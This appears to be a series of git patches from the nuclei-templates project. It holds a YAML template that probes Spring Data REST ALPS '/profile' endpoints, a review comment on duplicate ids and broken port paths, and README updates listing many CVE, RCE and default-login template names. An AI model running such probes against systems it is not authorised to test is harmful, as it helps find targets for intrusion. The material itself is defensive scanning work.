+ name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
+ author: dwisiswant0
+ severity: medium
+
+ # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/profile"
+ - "{{BaseURL}}/api/profile"
+ - "{{BaseURL}}/alps/profile"
+ - "{{BaseURL}}:8080/profile"
+ - "{{BaseURL}}:8080/api/profile"
+ - "{{BaseURL}}:8080/alps/profile"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "_links"
+ - "/alps/"
+ - "profile"
+ condition: and
+ part: body
+ - type: word
+ words:
+ - "application/hal+json"
+ part: header
+ - type: status
+ status:
+ - 200
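Review bot: `id: exposed-alps-spring` is now declared by two files, this one and `exposures/files/exposed-alps-spring.yaml` from PATCH 41, with identical matchers and only the three `:8080` paths added here; the README tree in PATCH 44 lists both, so both would be loaded when the directory is scanned and anything keyed on the id cannot tell them apart — delete the `exposures/files` copy in the same change. The `{{BaseURL}}:8080/...` entries also assume the input carries no port: for an input such as `https://host:8443` they expand to `https://host:8443:8080/profile`, which is not a valid URL, so those three paths are better dropped in favour of listing port variants in the target input. As in the PATCH 41 copy, the `# https://niemand.com.ar/...` line under `info:` is a comment the parser discards and belongs in a `reference:` field.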
From d94bcfe9ec0cd74e223c8ad4b93717df64fc0d21 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 14:42:23 +0530 Subject: [PATCH 44/85] readme updates --- README.md | 589 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 589 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000000..202ee8e15a --- /dev/null +++ b/README.md 
@@ -0,0 +1,589 @@ + +# Nuclei Templates + +[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT) +[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases) +[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues) +[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei) +[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH) + +Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list. + +An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. + +### Nuclei templates `v7.3.7` overview + +| Templates | Counts | Templates | Counts | +| --------------- | ------ | ---------------- | ------ | +| cves | 147 | default-logins | 0 | +| dns | 0 | exposed-panels | 0 | +| exposed-tokens | 44 | exposures | 0 | +| fuzzing | 17 | helpers | 0 | +| miscellaneous | 6 | misconfiguration | 6 | +| takeovers | 0 | technologies | 0 | +| vulnerabilities | 0 | workflows | 0 | + + +### Nuclei templates `v7.3.7` tree overview + +
+ Nuclei templates + +``` +├── LICENSE.md +├── README.md +├── cves +│   ├── 2005 +│   │   └── CVE-2005-2428.yaml +│   ├── 2008 +│   │   └── CVE-2008-2398.yaml +│   ├── 2013 +│   │   └── CVE-2013-2251.yaml +│   ├── 2014 +│   │   └── CVE-2014-6271.yaml +│   ├── 2017 +│   │   ├── CVE-2017-10075.yaml +│   │   ├── CVE-2017-11444.yaml +│   │   ├── CVE-2017-12637.yaml +│   │   ├── CVE-2017-14537.yaml +│   │   ├── CVE-2017-14849.yaml +│   │   ├── CVE-2017-5638.yaml +│   │   ├── CVE-2017-7391.yaml +│   │   ├── CVE-2017-7615.yaml +│   │   ├── CVE-2017-9506.yaml +│   │   └── CVE-2017-9841.yaml +│   ├── 2018 +│   │   ├── CVE-2018-0296.yaml +│   │   ├── CVE-2018-1000129.yaml +│   │   ├── CVE-2018-11409.yaml +│   │   ├── CVE-2018-11759.yaml +│   │   ├── CVE-2018-1247.yaml +│   │   ├── CVE-2018-1271.yaml +│   │   ├── CVE-2018-1273.yaml +│   │   ├── CVE-2018-13379.yaml +│   │   ├── CVE-2018-13380.yaml +│   │   ├── CVE-2018-14728.yaml +│   │   ├── CVE-2018-16341.yaml +│   │   ├── CVE-2018-16763.yaml +│   │   ├── CVE-2018-17431.yaml +│   │   ├── CVE-2018-18069.yaml +│   │   ├── CVE-2018-19386.yaml +│   │   ├── CVE-2018-19439.yaml +│   │   ├── CVE-2018-20824.yaml +│   │   ├── CVE-2018-2791.yaml +│   │   ├── CVE-2018-3714.yaml +│   │   ├── CVE-2018-3760.yaml +│   │   ├── CVE-2018-5230.yaml +│   │   ├── CVE-2018-7251.yaml +│   │   ├── CVE-2018-7490.yaml +│   │   └── CVE-2018-8006.yaml +│   ├── 2019 +│   │   ├── CVE-2019-10092.yaml +│   │   ├── CVE-2019-1010287.yaml +│   │   ├── CVE-2019-10475.yaml +│   │   ├── CVE-2019-11248.yaml +│   │   ├── CVE-2019-11510.yaml +│   │   ├── CVE-2019-11580.yaml +│   │   ├── CVE-2019-11581.yaml +│   │   ├── CVE-2019-11869.yaml +│   │   ├── CVE-2019-12314.yaml +│   │   ├── CVE-2019-12461.yaml +│   │   ├── CVE-2019-12593.yaml +│   │   ├── CVE-2019-12725.yaml +│   │   ├── CVE-2019-14223.yaml +│   │   ├── CVE-2019-14322.yaml +│   │   ├── CVE-2019-14696.yaml +│   │   ├── CVE-2019-14974.yaml +│   │   ├── CVE-2019-15043.yaml +│   │   ├── CVE-2019-15107.yaml +│ 
  │   ├── CVE-2019-15858.yaml +│   │   ├── CVE-2019-16278.yaml +│   │   ├── CVE-2019-1653.yaml +│   │   ├── CVE-2019-16662.yaml +│   │   ├── CVE-2019-16759-1.yaml +│   │   ├── CVE-2019-16759.yaml +│   │   ├── CVE-2019-16920.yaml +│   │   ├── CVE-2019-17382.yaml +│   │   ├── CVE-2019-17558.yaml +│   │   ├── CVE-2019-18394.yaml +│   │   ├── CVE-2019-19368.yaml +│   │   ├── CVE-2019-19781.yaml +│   │   ├── CVE-2019-19908.yaml +│   │   ├── CVE-2019-19985.yaml +│   │   ├── CVE-2019-20141.yaml +│   │   ├── CVE-2019-2588.yaml +│   │   ├── CVE-2019-2725.yaml +│   │   ├── CVE-2019-3396.yaml +│   │   ├── CVE-2019-3402.yaml +│   │   ├── CVE-2019-3799.yaml +│   │   ├── CVE-2019-5418.yaml +│   │   ├── CVE-2019-6112.yaml +│   │   ├── CVE-2019-6340.yaml +│   │   ├── CVE-2019-6715.yaml +│   │   ├── CVE-2019-7219.yaml +│   │   ├── CVE-2019-7256.yaml +│   │   ├── CVE-2019-7609.yaml +│   │   ├── CVE-2019-8442.yaml +│   │   ├── CVE-2019-8449.yaml +│   │   ├── CVE-2019-8451.yaml +│   │   ├── CVE-2019-8903.yaml +│   │   ├── CVE-2019-8982.yaml +│   │   ├── CVE-2019-9670.yaml +│   │   ├── CVE-2019-9733.yaml +│   │   ├── CVE-2019-9955.yaml +│   │   └── CVE-2019-9978.yaml +│   └── 2020 +│   ├── CVE-2020-0618.yaml +│   ├── CVE-2020-10148.yaml +│   ├── CVE-2020-10199.yaml +│   ├── CVE-2020-10204.yaml +│   ├── CVE-2020-11034.yaml +│   ├── CVE-2020-1147.yaml +│   ├── CVE-2020-11738.yaml +│   ├── CVE-2020-12116.yaml +│   ├── CVE-2020-12720.yaml +│   ├── CVE-2020-13167.yaml +│   ├── CVE-2020-13942.yaml +│   ├── CVE-2020-14179.yaml +│   ├── CVE-2020-14181.yaml +│   ├── CVE-2020-14864.yaml +│   ├── CVE-2020-14882.yaml +│   ├── CVE-2020-15129.yaml +│   ├── CVE-2020-15505.yaml +│   ├── CVE-2020-15920.yaml +│   ├── CVE-2020-16139.yaml +│   ├── CVE-2020-16846.yaml +│   ├── CVE-2020-16952.yaml +│   ├── CVE-2020-17505.yaml +│   ├── CVE-2020-17506.yaml +│   ├── CVE-2020-17518.yaml +│   ├── CVE-2020-17519.yaml +│   ├── CVE-2020-1943.yaml +│   ├── CVE-2020-2096.yaml +│   ├── CVE-2020-2140.yaml +│   ├── 
CVE-2020-23972.yaml +│   ├── CVE-2020-24223.yaml +│   ├── CVE-2020-24312.yaml +│   ├── CVE-2020-2551.yaml +│   ├── CVE-2020-25540.yaml +│   ├── CVE-2020-26214.yaml +│   ├── CVE-2020-3187.yaml +│   ├── CVE-2020-3452.yaml +│   ├── CVE-2020-4463.yaml +│   ├── CVE-2020-5284.yaml +│   ├── CVE-2020-5405.yaml +│   ├── CVE-2020-5410.yaml +│   ├── CVE-2020-5412.yaml +│   ├── CVE-2020-5776.yaml +│   ├── CVE-2020-5777.yaml +│   ├── CVE-2020-5902.yaml +│   ├── CVE-2020-6287.yaml +│   ├── CVE-2020-7209.yaml +│   ├── CVE-2020-7318.yaml +│   ├── CVE-2020-7961.yaml +│   ├── CVE-2020-8091.yaml +│   ├── CVE-2020-8115.yaml +│   ├── CVE-2020-8163.yaml +│   ├── CVE-2020-8191.yaml +│   ├── CVE-2020-8193.yaml +│   ├── CVE-2020-8194.yaml +│   ├── CVE-2020-8209.yaml +│   ├── CVE-2020-8512.yaml +│   ├── CVE-2020-8982.yaml +│   ├── CVE-2020-9047.yaml +│   ├── CVE-2020-9344.yaml +│   ├── CVE-2020-9484.yaml +│   ├── CVE-2020-9496.yaml +│   └── CVE-2020-9757.yaml +├── default-logins +│   ├── activemq +│   │   └── activemq-default-login.yaml +│   ├── ambari +│   │   └── ambari-default-credentials.yaml +│   ├── apache +│   │   └── tomcat-manager-default.yaml +│   ├── grafana +│   │   └── grafana-default-credential.yaml +│   ├── ofbiz +│   │   └── ofbiz-default-credentials.yaml +│   ├── rabbitmq +│   │   └── rabbitmq-default-admin.yaml +│   ├── solarwinds +│   │   └── solarwinds-default-admin.yaml +│   └── zabbix +│   └── zabbix-default-credentials.yaml +├── dns +│   ├── azure-takeover-detection.yaml +│   ├── cname-service-detector.yaml +│   ├── dead-host-with-cname.yaml +│   ├── mx-service-detector.yaml +│   ├── servfail-refused-hosts.yaml +│   └── spoofable-spf-records-ptr.yaml +├── exposed-panels +│   ├── active-admin-exposure.yaml +│   ├── activemq-panel.yaml +│   ├── adminer-panel.yaml +│   ├── aims-password-mgmt-client.yaml +│   ├── airflow-exposure.yaml +│   ├── ambari-exposure.yaml +│   ├── ansible-tower-exposure.yaml +│   ├── atlassian-crowd-panel.yaml +│   ├── cisco-asa-panel.yaml +│   
├── citrix-adc-gateway-detect.yaml +│   ├── citrix-vpn-detect.yaml +│   ├── compal-panel.yaml +│   ├── couchdb-exposure.yaml +│   ├── couchdb-fauxton.yaml +│   ├── crxde.yaml +│   ├── django-admin-panel.yaml +│   ├── druid-console-exposure.yaml +│   ├── exposed-pagespeed-global-admin.yaml +│   ├── exposed-webalizer.yaml +│   ├── flink-exposure.yaml +│   ├── fortinet-fortigate-panel.yaml +│   ├── fortiweb-panel.yaml +│   ├── github-enterprise-detect.yaml +│   ├── gitlab-detect.yaml +│   ├── globalprotect-panel.yaml +│   ├── go-anywhere-client.yaml +│   ├── grafana-detect.yaml +│   ├── hadoop-exposure.yaml +│   ├── identityguard-selfservice-entrust.yaml +│   ├── iomega-lenovo-emc-shared-nas-detect.yaml +│   ├── jira-detect.yaml +│   ├── jmx-console.yaml +│   ├── kafka-connect-ui.yaml +│   ├── kafka-monitoring.yaml +│   ├── kafka-topics-ui.yaml +│   ├── kubernetes-dashboard.yaml +│   ├── manage-engine-admanager-panel.yaml +│   ├── mobileiron-login.yaml +│   ├── netscaler-gateway.yaml +│   ├── network-camera-detect.yaml +│   ├── oipm-detect.yaml +│   ├── parallels-html-client.yaml +│   ├── phpmyadmin-panel.yaml +│   ├── polycom-admin-detect.yaml +│   ├── public-tomcat-instance.yaml +│   ├── pulse-secure-panel.yaml +│   ├── rabbitmq-dashboard.yaml +│   ├── rocketmq-console-exposure.yaml +│   ├── rsa-self-service.yaml +│   ├── sap-hana-xsengine-panel.yaml +│   ├── sap-netweaver-detect.yaml +│   ├── sap-recon-detect.yaml +│   ├── selenoid-ui-exposure.yaml +│   ├── setup-page-exposure.yaml +│   ├── solarwinds-orion.yaml +│   ├── solr-exposure.yaml +│   ├── sonarqube-login.yaml +│   ├── sonicwall-management-panel.yaml +│   ├── sonicwall-sslvpn-panel.yaml +│   ├── sophos-fw-version-detect.yaml +│   ├── supervpn-panel.yaml +│   ├── tikiwiki-cms.yaml +│   ├── tomcat-manager-pathnormalization.yaml +│   ├── traefik-dashboard.yaml +│   ├── virtual-ema-detect.yaml +│   ├── weave-scope-dashboard-detect.yaml +│   ├── webeditors.yaml +│   ├── webmin-panel.yaml +│   ├── 
workspace-one-uem.yaml +│   ├── workspaceone-uem-airwatch-dashboard-detect.yaml +│   ├── yarn-manager-exposure.yaml +│   └── zipkin-exposure.yaml +├── exposed-tokens +│   ├── aws +│   │   ├── amazon-mws-auth-token-value.yaml +│   │   └── aws-access-key-value.yaml +│   ├── generic +│   │   ├── credentials-disclosure.yaml +│   │   ├── general-tokens.yaml +│   │   └── http-username-password.yaml +│   ├── google +│   │   ├── fcm-server-key.yaml +│   │   └── google-api-key.yaml +│   ├── mailchimp +│   │   └── mailchimp-api-key.yaml +│   └── slack +│   └── slack-access-token.yaml +├── exposures +│   ├── apis +│   │   ├── swagger-api.yaml +│   │   ├── wadl-api.yaml +│   │   └── wsdl-api.yaml +│   ├── backups +│   │   ├── sql-dump.yaml +│   │   └── zip-backup-files.yaml +│   ├── configs +│   │   ├── airflow-configuration-exposure.yaml +│   │   ├── amazon-docker-config-disclosure.yaml +│   │   ├── ansible-config-disclosure.yaml +│   │   ├── composer-config.yaml +│   │   ├── exposed-alps-spring.yaml +│   │   ├── exposed-svn.yaml +│   │   ├── git-config-nginxoffbyslash.yaml +│   │   ├── git-config.yaml +│   │   ├── htpasswd-detection.yaml +│   │   ├── laravel-env.yaml +│   │   ├── magento-config.yaml +│   │   ├── opcache-status-exposure.yaml +│   │   ├── owncloud-config.yaml +│   │   ├── package-json.yaml +│   │   ├── perl-status.yaml +│   │   ├── phpinfo.yaml +│   │   ├── rails-database-config.yaml +│   │   ├── redmine-db-config.yaml +│   │   ├── server-status-localhost.yaml +│   │   ├── syfmony-profiler.yaml +│   │   ├── symfony-database-config.yaml +│   │   ├── symfony-profiler.yaml +│   │   └── web-config.yaml +│   ├── files +│   │   ├── domcfg-page.yaml +│   │   ├── drupal-install.yaml +│   │   ├── ds_store.yaml +│   │   ├── exposed-alps-spring.yaml +│   │   ├── filezilla.yaml +│   │   ├── lazy-file.yaml +│   │   ├── server-private-keys.yaml +│   │   └── xprober-service.yaml +│   └── logs +│   ├── elmah-log-file.yaml +│   ├── error-logs.yaml +│   ├── 
rails-debug-mode.yaml +│   ├── struts-debug-mode.yaml +│   └── trace-axd-detect.yaml +├── fuzzing +│   ├── arbitrary-file-read.yaml +│   ├── basic-auth-bruteforce.yaml +│   ├── directory-traversal.yaml +│   ├── generic-lfi-fuzzing.yaml +│   ├── iis-shortname.yaml +│   └── wp-plugin-scan.yaml +├── helpers +│   ├── payloads +│   │   ├── CVE-2020-5776.csv +│   │   └── CVE-2020-6287.xml +│   └── wordlists +│   └── wp-plugins.txt +├── miscellaneous +│   ├── basic-cors-flash.yaml +│   ├── dir-listing.yaml +│   ├── htaccess-config.yaml +│   ├── missing-csp.yaml +│   ├── missing-hsts.yaml +│   ├── missing-x-frame-options.yaml +│   ├── ntlm-directories.yaml +│   ├── old-copyright.yaml +│   ├── robots.txt.yaml +│   ├── security.txt.yaml +│   ├── trace-method.yaml +│   ├── unencrypted-bigip-ltm-cookie.yaml +│   ├── wp-xmlrpc.yaml +│   └── xml-schema-detect.yaml +├── misconfiguration +│   ├── aem-groovyconsole.yaml +│   ├── airflow-api-exposure.yaml +│   ├── apache-tomcat-snoop.yaml +│   ├── apc-info.yaml +│   ├── aspx-debug-mode.yaml +│   ├── aws-redirect.yaml +│   ├── cgi-test-page.yaml +│   ├── django-debug-detect.yaml +│   ├── docker-api.yaml +│   ├── docker-registry.yaml +│   ├── druid-monitor.yaml +│   ├── drupal-user-enum-ajax.yaml +│   ├── drupal-user-enum-redirect.yaml +│   ├── elasticsearch.yaml +│   ├── exposed-kibana.yaml +│   ├── exposed-service-now.yaml +│   ├── front-page-misconfig.yaml +│   ├── hadoop-unauth.yaml +│   ├── jkstatus-manager.yaml +│   ├── jupyter-ipython-unauth.yaml +│   ├── kubernetes-pods.yaml +│   ├── larvel-debug.yaml +│   ├── linkerd-ssrf-detect.yaml +│   ├── manage-engine-ad-search.yaml +│   ├── php-errors.yaml +│   ├── put-method-enabled.yaml +│   ├── rack-mini-profiler.yaml +│   ├── salesforce-aura-misconfig.yaml +│   ├── shell-history.yaml +│   ├── sidekiq-dashboard.yaml +│   ├── springboot-detect.yaml +│   ├── symfony-debugmode.yaml +│   ├── tomcat-scripts.yaml +│   ├── unauthenticated-airflow.yaml +│   ├── 
unauthenticated-nacos-access.yaml +│   ├── wamp-xdebug-detect.yaml +│   └── zenphoto-installation-sensitive-info.yaml +├── takeovers +│   └── subdomain-takeover.yaml +├── technologies +│   ├── apache-detect.yaml +│   ├── artica-web-proxy-detect.yaml +│   ├── basic-auth-detection.yaml +│   ├── bigip-config-utility-detect.yaml +│   ├── cacti-detect.yaml +│   ├── clockwork-php-page.yaml +│   ├── couchdb-detect.yaml +│   ├── favicon-detection.yaml +│   ├── firebase-detect.yaml +│   ├── google-storage.yaml +│   ├── graphql.yaml +│   ├── graylog-api-browser.yaml +│   ├── home-assistant.yaml +│   ├── jaspersoft-detect.yaml +│   ├── jolokia.yaml +│   ├── kibana-detect.yaml +│   ├── kong-detect.yaml +│   ├── liferay-portal-detect.yaml +│   ├── linkerd-badrule-detect.yaml +│   ├── lotus-domino-version.yaml +│   ├── magmi-detect.yaml +│   ├── mrtg-detect.yaml +│   ├── netsweeper-webadmin-detect.yaml +│   ├── nifi-detech.yaml +│   ├── oidc-detect.yaml +│   ├── pi-hole-detect.yaml +│   ├── prometheus-exporter-detect.yaml +│   ├── prometheus-exposed-panel.yaml +│   ├── prtg-detect.yaml +│   ├── redmine-cli-detect.yaml +│   ├── s3-detect.yaml +│   ├── sap-netweaver-as-java-detect.yaml +│   ├── sap-netweaver-detect.yaml +│   ├── shiro-detect.yaml +│   ├── sql-server-reporting.yaml +│   ├── tech-detect.yaml +│   ├── telerik-dialoghandler-detect.yaml +│   ├── telerik-fileupload-detect.yaml +│   ├── terraform-detect.yaml +│   ├── tomcat-detect.yaml +│   ├── tor-socks-proxy.yaml +│   ├── waf-detect.yaml +│   ├── weblogic-detect.yaml +│   └── werkzeug-debugger-detect.yaml +├── vulnerabilities +│   ├── generic +│   │   ├── basic-cors.yaml +│   │   ├── basic-xss-prober.yaml +│   │   ├── crlf-injection.yaml +│   │   ├── top-xss-params.yaml +│   │   └── url-redirect.yaml +│   ├── ibm +│   │   ├── eclipse-help-system-xss.yaml +│   │   └── ibm-infoprint-directory-traversal.yaml +│   ├── jenkins +│   │   ├── jenkins-asyncpeople.yaml +│   │   ├── jenkins-stack-trace.yaml +│   │   └── 
unauthenticated-jenkin-dashboard.yaml +│   ├── jira +│   │   ├── jira-service-desk-signup.yaml +│   │   ├── jira-unauthenticated-dashboards.yaml +│   │   ├── jira-unauthenticated-popular-filters.yaml +│   │   ├── jira-unauthenticated-projects.yaml +│   │   └── jira-unauthenticated-user-picker.yaml +│   ├── moodle +│   │   ├── moodle-filter-jmol-lfi.yaml +│   │   └── moodle-filter-jmol-xss.yaml +│   ├── oracle +│   │   └── oracle-ebs-bispgraph-file-access.yaml +│   ├── other +│   │   ├── acme-xss.yaml +│   │   ├── aspnuke-openredirect.yaml +│   │   ├── bullwark-momentum-series-directory-traversal.yaml +│   │   ├── cached-aem-pages.yaml +│   │   ├── couchdb-adminparty.yaml +│   │   ├── discourse-xss.yaml +│   │   ├── mcafee-epo-rce.yaml +│   │   ├── microstrategy-ssrf.yaml +│   │   ├── mida-eframework-xss.yaml +│   │   ├── nginx-module-vts-xss.yaml +│   │   ├── nuuo-nvrmini2-rce.yaml +│   │   ├── pdf-signer-ssti-to-rce.yaml +│   │   ├── rce-shellshock-user-agent.yaml +│   │   ├── rce-via-java-deserialization.yaml +│   │   ├── rconfig-rce.yaml +│   │   ├── sick-beard-xss.yaml +│   │   ├── symantec-messaging-gateway.yaml +│   │   ├── thinkific-redirect.yaml +│   │   ├── tikiwiki-reflected-xss.yaml +│   │   ├── twig-php-ssti.yaml +│   │   ├── vpms-auth-bypass.yaml +│   │   ├── wems-manager-xss.yaml +│   │   ├── yarn-resourcemanager-rce.yaml +│   │   └── zms-auth-bypass.yaml +│   ├── rails +│   │   └── rails6-xss.yaml +│   ├── springboot +│   │   ├── springboot-actuators-jolokia-xxe.yaml +│   │   └── springboot-h2-db-rce.yaml +│   ├── thinkific-redirect.yaml +│   ├── vmware +│   │   ├── vmware-vcenter-lfi-linux.yaml +│   │   └── vmware-vcenter-lfi.yaml +│   └── wordpress +│   ├── easy-wp-smtp-listing.yaml +│   ├── sassy-social-share.yaml +│   ├── w3c-total-cache-ssrf.yaml +│   ├── wordpress-accessible-wpconfig.yaml +│   ├── wordpress-db-backup.yaml +│   ├── wordpress-debug-log.yaml +│   ├── wordpress-directory-listing.yaml +│   ├── 
wordpress-emails-verification-for-woocommerce.yaml +│   ├── wordpress-emergency-script.yaml +│   ├── wordpress-installer-log.yaml +│   ├── wordpress-social-metrics-tracker.yaml +│   ├── wordpress-tmm-db-migrate.yaml +│   ├── wordpress-user-enumeration.yaml +│   ├── wordpress-wordfence-xss.yaml +│   └── wordpress-wpcourses-info-disclosure.yaml +└── workflows + ├── artica-web-proxy-workflow.yaml + ├── basic-auth-workflow.yaml + ├── bigip-workflow.yaml + ├── cisco-asa-workflow.yaml + ├── grafana-workflow.yaml + ├── jira-workflow.yaml + ├── liferay-workflow.yaml + ├── lotus-domino-workflow.yaml + ├── magmi-workflow.yaml + ├── mida-eframework-workflow.yaml + ├── netsweeper-workflow.yaml + ├── rabbitmq-workflow.yaml + ├── sap-netweaver-workflow.yaml + ├── solarwinds-orion-workflow.yaml + ├── springboot-workflow.yaml + ├── vbulletin-workflow.yaml + └── wordpress-workflow.yaml +``` + +
+ +**53 directories, 476 files**. + +📖 Documentation +----- + +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. + +💪 Contributions +----- + +Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. + +👨‍💻 Community +----- + +You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. + +💡 Notes +----- +- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. + + +Thanks again for your contribution and keeping the community vibrant. :heart: From f128031addc6e68206a37029ee15e94a9192cbe9 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 14:43:33 +0530 Subject: [PATCH 45/85] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 202ee8e15a..aef71e02ee 100644 --- a/README.md +++ b/README.md 
@@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. ### Nuclei templates `v7.3.7` overview +----- | Templates | Counts | Templates | Counts | | --------------- | ------ | ---------------- | ------ | @@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H ### Nuclei templates `v7.3.7` tree overview +-----
Nuclei templates From 5a3dccca5b01f14d3960bea539705cdba5ea7334 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 11 Jan 2021 09:14:17 +0000 Subject: [PATCH 46/85] Auto Update README [Mon Jan 11 09:14:17 UTC 2021] :robot: --- README.md | 45 +++++++++++++++------------------------------ 1 file changed, 15 insertions(+), 30 deletions(-) diff --git a/README.md b/README.md index aef71e02ee..5b4b264cbb 100644 --- a/README.md +++ b/README.md @@ -12,21 +12,19 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. ### Nuclei templates `v7.3.7` overview ------ -| Templates | Counts | Templates | Counts | -| --------------- | ------ | ---------------- | ------ | -| cves | 147 | default-logins | 0 | -| dns | 0 | exposed-panels | 0 | -| exposed-tokens | 44 | exposures | 0 | -| fuzzing | 17 | helpers | 0 | -| miscellaneous | 6 | misconfiguration | 6 | -| takeovers | 0 | technologies | 0 | -| vulnerabilities | 0 | workflows | 0 | +| Templates | Counts | Templates | Counts | +| --------------- | ------------------------------- | ---------------- | ------------------------------ | +| cves | 154 | default-logins | 8 | +| dns | 6 | exposed-panels | 72 | +| exposed-tokens | 9 | exposures | 41 | +| fuzzing | 6 | helpers | 3 | +| miscellaneous | 14 | misconfiguration | 37 | +| takeovers | 1 | technologies | 44 | +| vulnerabilities | 62 | workflows | 17 | ### Nuclei templates `v7.3.7` tree overview ------
Nuclei templates @@ -566,26 +564,13 @@ An overview of the nuclei template directory including number of templates and H
-**53 directories, 476 files**. +**53 directories, 477 files**. -📖 Documentation ------ - -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. - -💪 Contributions ------ - -Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. - -👨‍💻 Community ------ - -You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. - -💡 Notes ------ -- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. +------ +**Notes:** +1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests. +2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. :heart: From 2411de1934d9bd6438627169b7c3dc9af0a12d7a Mon Sep 17 00:00:00 2001 
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 14:46:07 +0530 Subject: [PATCH 47/85] readme updates --- .github/scripts/README.tmpl | 25 ++++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index b564f8fccf..4d10939eda 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -12,6 +12,7 @@ Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/n An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. ### Nuclei templates `{version}` overview +------ | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | @@ -25,6 +26,7 @@ An overview of the nuclei template directory including number of templates and H ### Nuclei templates `{version}` tree overview +-----
Nuclei templates @@ -37,12 +39,25 @@ An overview of the nuclei template directory including number of templates and H **{command("tree", -2, None)}**. -Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. +📖 Documentation +----- + +Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding. + +💪 Contributions +----- + +Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome. + +👨‍💻 Community +----- + +You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery. + +💡 Notes +----- +- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests. ------- -**Notes:** -1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests. -2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. :heart: """ \ No newline at end of file From 